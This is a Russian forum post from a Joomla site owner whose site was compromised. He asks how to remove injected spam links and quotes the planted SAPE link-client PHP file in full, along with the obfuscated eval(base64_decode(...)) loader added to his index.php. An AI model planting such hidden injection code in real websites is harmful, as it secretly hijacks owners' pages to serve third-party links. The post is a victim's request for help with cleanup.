Как убрать левые ссылки с сайта?

Здравствуйте!
У меня сайт на Joomla 1.5; немного подредактированный дизайн стандартного шаблона "rhuk_milkyway"...
Вчера, 26 февраля 2011 года заметил у себя на сайте левую ссылку - на странице "Контакты" в самом низу, не в дизайне сайта. После некоторых поисков обнаружил не свою папку table, содержащую два файлика: links.db и tr.php.
links.db содержал ссылки на сторонние сайты, о существовании оных я в беспечности своей до сей поры и не предполагал (по гео - от Украйны до Франции).
tr.php имел следующее содержание:
<?
if (!defined('_SAPE_USER')){
define('_SAPE_USER', base64_decode('YjIyODgzMDYxZGEwZTYyZmVjY2U4NWM5ZWRhY2EyZTE='));
}

//Основной класс, выполняющий всю рутину
class SAPE_base {

var $_version = '1.0.2';

var $_verbose = false;

var $_charset = ''; // http://www.php.net/manual/en/function.iconv.php

var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');

var $_cache_lifetime = 3600; // Пожалейте наш сервер :о)

// Если скачать базу ссылок не удалось, то следующая попытка будет через столько секунд
var $_cache_reloadtime = 600;

var $_error = '';

var $_host = '';

var $_request_uri = '';

var $_multi_site = false;

var $_fetch_remote_type = ''; // Способ подключения к удалённому серверу [file_get_contents|curl|socket]

var $_socket_timeout = 6; // Сколько ждать ответа

var $_force_show_code = false;

var $_is_our_bot = false; //Если наш робот

var $_debug = false;

var $_db_file = ''; //Путь к файлу с данными

function SAPE_base($options = null) {

// Поехали Shocked

)

$host = '';

if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
} elseif (strlen($options)) {
$host = $options;
$options = array();
} else {
$options = array();
}

// Какой сайт?
if (strlen($host)) {
$this->_host = $host;
} else {
$this->_host = $_SERVER['HTTP_HOST'];
}

$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);

// Какая страница?
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
} else {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}

// На случай, если хочется много сайтов в одной папке
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}

// Сообщать об ошибках
if (isset($options['verbose']) && $options['verbose'] == true) {
$this->_verbose = true;
}

// Кодировка
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}

if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}

if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}

// Всегда выводить чек-код
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}

// Выводить информацию о дебаге
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}

if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
}

// Определяем наш ли робот
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)){
$this->_debug = true;
}
} else {
$this->_is_our_bot = false;
}

//Перемешиваем список
srand((float)microtime() * 1000000);
// shuffle($this->_server_list);
}

/*
* Функция для подключения к удалённому серверу
*/
function fetch_remote_file($host, $path) {

$user_agent = $this->_user_agent.' '.$this->_version;

@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
@ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
         $this->_fetch_remote_type = 'file_get_contents';
if ($data = @file_get_contents('http://' . $host . $path)) {
return $data;
}

} elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
         $this->_fetch_remote_type = 'curl';
if ($ch = @curl_init()) {

@curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
@curl_setopt($ch, CURLOPT_HEADER, false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
@curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);

if ($data = @curl_exec($ch)) {
return $data;
}

@curl_close($ch);
}

} else {
         $this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);

$page = explode("\r\n\r\n", $buff);

return $page[1];
}

}

return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path.', type: '.$this->_fetch_remote_type);
}

/*
* Функция чтения из локального файла
*/
function _read($filename) {

$fp = @fopen($filename, 'rb');
@flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = @filesize($filename);
$mqr = get_magic_quotes_runtime();
set_magic_quotes_runtime(0);
if ($length) {
$data = @fread($fp, $length);
} else {
$data = '';
}
set_magic_quotes_runtime($mqr);
@flock($fp, LOCK_UN);
@fclose($fp);

return $data;
}

return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}

/*
* Функция записи в локальный файл
*/
function _write($filename, $data) {

$fp = @fopen($filename, 'wb');
if ($fp) {
@flock($fp, LOCK_EX);
$length = strlen($data);
@fwrite($fp, $data, $length);
@flock($fp, LOCK_UN);
@fclose($fp);

if (md5($this->_read($filename))!= md5($data)) {
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}

return true;
}

return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}

/*
* Функция обработки ошибок
*/
function raise_error($e) {

$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';

if ($this->_verbose == true) {
print $this->_error;
}

return false;
}

function load_data() {
$this->_db_file = $this->_get_db_file();

if (!is_file($this->_db_file)) {
// Пытаемся создать файл.
if (@touch($this->_db_file)) {
@chmod($this->_db_file, 0666); // Права доступа
} else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}

if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}

@clearstatcache();

if (filemtime($this->_db_file) < (time()-$this->_cache_lifetime) || filesize($this->_db_file) == 0) {

// Чтобы не повесить площадку клиента и чтобы не было одновременных запросов
@touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));

$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}

foreach ($this->_server_list as $i => $server){
     if ($data = $this->fetch_remote_file($server, $path)) {
     if (substr($data, 0, 12) == 'FATAL ERROR:') {
     $this->raise_error($data);
     } else {
     // [псевдо]проверка целостности:
     if (@unserialize($data)!= false) {
     $this->_write($this->_db_file, $data);
     break;
     }
     }
     }
}
}

// Убиваем PHPSESSID
if (strlen(session_id())) {
$session = session_name(). '=' . session_id();
$this->_request_uri = str_replace(array('?'.$session,'&'.$session), '', $this->_request_uri);
}

if ($data = $this->_read($this->_db_file)) {
   $this->set_data(@unserialize($data));
}
}
}

class SAPE_client extends SAPE_base {

   var $_links_delimiter = '';
   var $_links = array();
   var $_links_page = array();
   var $_user_agent = 'SAPE_Client PHP';

function SAPE_client($options = null) {
   parent::SAPE_base($options);
$this->load_data();
}

/*
* Ccылки можно показывать по частям
*/
function return_links($n = null, $offset = 0) {

if (is_array($this->_links_page)) {

$total_page_links = count($this->_links_page);

if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}

$links = array();

for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
} else {
$links[] = array_shift($this->_links_page);
}
}

$html = join($this->_links_delimiter, $links);

if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}

return $html;

} else {
return $this->_links_page;
}

}

function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__). '/' . $this->_host . '.links.db';
} else {
return dirname(__FILE__). '/links.db';
}
}

function _get_dispenser_path(){
   return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}

function set_data($data){
   $this->_links = $data;
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
} else {
   if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
      if ($this->_is_our_bot || $this->_force_show_code){
         $this->_links_page = $this->_links['__sape_new_url__'];
      }
   }
}
}

}

class SAPE_context extends SAPE_base {

   var $_words = array();
   var $_words_page = array();
   var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array( "a", "textarea", "select", "script", "style", "label", "noscript" , "noindex", "button" );

function SAPE_context($options = null) {
      parent::SAPE_base($options);
$this->load_data();
}

/*
* Замена слов в куске текста и обрамляет его тегами sape_index
*
*/

function replace_in_text_segment($text){
$debug = '';
if (count($this->_words_page) > 0) {

$source_sentence = array();
//Создаем массив исходных текстов для замены
foreach ($this->_words_page as $n => $sentence){
$source_sentences[$n] = str_replace(' ','((\s)|( ))+',preg_quote(strip_tags($sentence),'/'));
}

//если это первый кусок, то не будем добавлять <
$first_part = true;
//пустая переменная для записи
$debug = '';
if (count($source_sentences) > 0){

$content = '';
$open_tags = array(); //Открытые забаненые тэги
$close_tag = ''; //Название текущего закрывающего тэга

//Разбиваем по символу начала тега
$part = strtok(' '.$text, '<');

while ($part !== false){
//Определяем название тэга
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)){
//Определяем название тега
$tag_name = strtolower($matches[1]);
//Определяем закрывающий ли тэг
if (substr($tag_name,0,1) == '/'){
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '';
}
} else {
$close_tag = '';
if ($this->_debug) {
$debug .= '';
}
}
$cnt_tags = count($open_tags);
//Если закрывающий тег совпадает с тегом в стеке открытых запрещенных тегов
if (($cnt_tags > 0) && ($open_tags[$cnt_tags-1] == $close_tag)){
array_pop($open_tags);
if ($this->_debug) {
$debug .= '';
}
if ($cnt_tags-1 ==0){
if ($this->_debug) {
$debug .= '';
}
}
}

//Если нет открытых плохих тегов, то обрабатываем
if (count($open_tags) == 0){
//если не запрещенный тэг, то начинаем обработку
if (!in_array($tag_name, $this->_filter_tags)){
$split_parts = explode('>', $part, 2);
//Перестраховываемся
if (count($split_parts) == 2){
//Начинаем перебор фраз для замены
foreach ($source_sentences as $n => $sentence){
if (preg_match('/'.$sentence.'/', $split_parts[1]) == 1){
$split_parts[1] = preg_replace('/'.$sentence.'/', $this->_words_page[$n], $split_parts[1], 1);
//Если заменили, то удаляем строчку из списка замены
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
if ($this->_debug) {
$debug .= '';
}
}
}
$part = $split_parts[0].'>'.$split_parts[1];
unset($split_parts);
}
} else {
//Если у нас запрещеный тэг, то помещаем его в стек открытых
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '';
}
}
}
} else {
//Если нет названия тега, то считаем, что перед нами текст
foreach ($source_sentences as $n => $sentence){
if (preg_match('/'.$sentence.'/', $part) == 1){
$part = preg_replace('/'.$sentence.'/', $this->_words_page[$n], $part, 1);
//Если заменили, то удаляем строчку из списка замены,
//чтобы было можно делать множественный вызов
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
if ($this->_debug) {
$debug .= '';
}
}
}
}

//Если у нас режим дебагинга, то выводим
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
//Если это первая часть, то не выводим <
if ($first_part ){
$content .= $part;
$first_part = false;
} else {
$content .= $debug.'<'.$part;
}
//Получаем следующу часть
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
} else {
if ($this->_debug){
$debug .= '';
}
}

if ($this->_debug){
$debug .= '';
}

if ($this->_is_our_bot || $this->_force_show_code || $this->_debug){
$text = '<sape_index>'.$text.'</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])){
$text .= $this->_words['__sape_new_url__'];
}
}

if ($this->_debug){
$text .= $debug;
}
return $text;
}

/*
* Замена слов
*
*/
function replace_in_page(&$buffer) {

if (count($this->_words_page) > 0) {
//разбиваем строку по sape_index
//Проверяем есть ли теги sape_index
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1){
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3){
for ($i =1; $i < $cnt_parts; $i = $i + 2){
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug){
$buffer .= '';
}
} else {
//Если не нашли sape_index, то пробуем разбить по BODY
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
//Если нашли содержимое между body
if (count($split_content) == 5){
$split_content[0] = $split_content[0].$split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3].$split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0].$split_content[1].$split_content[2];
if ($this->_debug){
$buffer .= '';
}
} else {
//Если не нашли sape_index и не смогли разбить по body
if ($this->_debug){
$buffer .= '';
}
}
}

} else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug){
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/','', $buffer);
} else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])){
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug){
$buffer .= '';
}
}
return $buffer;
}

function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__). '/' . $this->_host . '.words.db';
} else {
return dirname(__FILE__). '/words.db';
}
}
function _get_dispenser_path() {
   return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}

    function set_data($data) {
       $this->_words = $data;
     if (array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
     $this->_words_page = $this->_words[$this->_request_uri];
     }
    }
}

?>

Сами ссылки из файла links.db находились в самом низу страницы, перед закрывающим body.
Удаление папки table или любого содержащегося в ней файла приводило к чистой странице сайта. Очистил файлик от его содержимого. Включив логикику (я не программист, с php знаком "постольку-поскольку", можно сказать - никак), нашел в корневом index.php (не в том, который в папке "templates", а в том, который лежит в "www" или, в моём случае - httpdocs некоторые изменения, файл index.php:
в самом верху файла стояло:
ob_start();
(это после * See COPYRIGHT.php for copyright notices and details.
*/)
А в самом низу добавилось:

$ec = ob_get_contents();
ob_clean();
eval(base64_decode('ICRjbSA9ICc8Zm9udCBzaXplPSIxIj4nOw0KICAgICByZXF1aXJlX29uY2UoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2F2dG9wYXJrL2luZGV4L3RhYmxlL3RyLnBocCcpOw0KICAgICAkb1snZm9yY2Vfc2hvd19jb2RlJ10gPSB0cnVlOyANCiAgICAgJG9bJ2NoYXJzZXQnXSA9ICdVVEYtOCc7DQogICAgICRzYXBlID0gbmV3IFNBUEVfY2xpZW50KCRvKTsNCiAgICAgJGNtIC49ICAkc2FwZS0+cmV0dXJuX2xpbmtzKCk7DQokY20gLj0gJzwvZm9udD4nOw=='));
$ec = str_replace('</body>','',$ec);
$ec = str_replace('</html>','',$ec);
echo $ec.$cm."</body></html>";
?>

Всё это убрал, работает вроде всё нормально, добавил в .htaccess команды, запрещающие незаконные в отношении моего сайта действия, и... ...успокоился.
Сегодня, 27 февраля 2011 года все удаленные мной вчера чужие файлики и коды опять оказались на своём месте, с той лишь разницей, что ссылки не были визуально видны на сайте (теперь они стояли в что-то вроде "nodispley", точно не помню). Повторил вчерашнюю процедуру удаления, плюс - поменял пароли на доступы по ftp и через панель управления, отметил корневой index.php "только для чтения"... Жду - чё дальше будет.
Сам код вроде как каким-то боком относится к бирже ссылок.
Если кто-то с ентой ерундой сталкивался - подскажите панацею - как враз и наффсегда от ентого избавиться.

	Автор	Тема: Как убрать левые ссылки с сайта? (Прочитано 2295 раз)
0 Пользователей и 2 Гостей смотрят эту тему.